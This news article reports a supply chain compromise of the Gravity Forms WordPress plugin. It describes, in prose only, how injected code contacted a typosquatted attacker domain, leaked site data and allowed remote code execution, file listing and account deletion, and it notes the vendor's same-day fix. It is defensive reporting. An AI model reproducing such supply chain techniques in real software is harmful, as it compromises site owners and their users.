WordPress security company Patchstack published an advisory about a serious vulnerability in Gravity Forms caused by a supply chain attack. Gravity Forms responded immediately and released an update to fix the issue.
Supply Chain Attack
Patchstack has been monitoring an attack on a WordPress plugin in which the attackers uploaded an infected version of the plugin directly to the publisher’s repository and fetched other files from a domain name similar to the official domain. This, in turn, led to a serious compromise of websites that used that plugin.
A similar attack was observed in Gravity Forms and was immediately addressed by the publisher. Malicious code had been injected into Gravity Forms (specifically in gravityforms/common.php) by the attackers. The code caused the plugin, when installed, to make HTTP POST requests to the rogue domain gravityapi.org, which was registered just days before the attack and controlled by the attacker.
The compromised plugin sent detailed site and server information to the attacker’s server and enabled remote code execution on the infected sites. In the context of a WordPress plugin, a remote code execution (RCE) vulnerability occurs when an attacker can run malicious code on a targeted website from a remote location.
Patchstack explained the extent of the vulnerability:
“…it can perform multiple processes:
- Upload an arbitrary file to the server.
- List all of the user accounts on the WordPress site (ID, username, email, display name).
- Delete any user accounts on the WordPress site.
- Perform arbitrary file and directory listings on the WordPress server.”
That last one means that the attacker can view any file, regardless of permissions, which would include the wp-config.php file which contains database credentials.
Gravity Forms Responds
RocketGenius, the publishers of Gravity Forms, took immediate action and uploaded a fixed version of the plugin right away, on the very same day. The domain name registrar, Namecheap, suspended the rogue typosquatted domain which effectively blocked any compromised websites from contacting the attackers.
Gravity Forms has released an update to the plugin, version 2.9.13. Users may want to consider updating to the very latest version.
Read more at Patchstack:
Malware Found in Official Gravity Forms Plugin Indicating Supply Chain Breach
Featured Image by Shutterstock/Warm_Tail
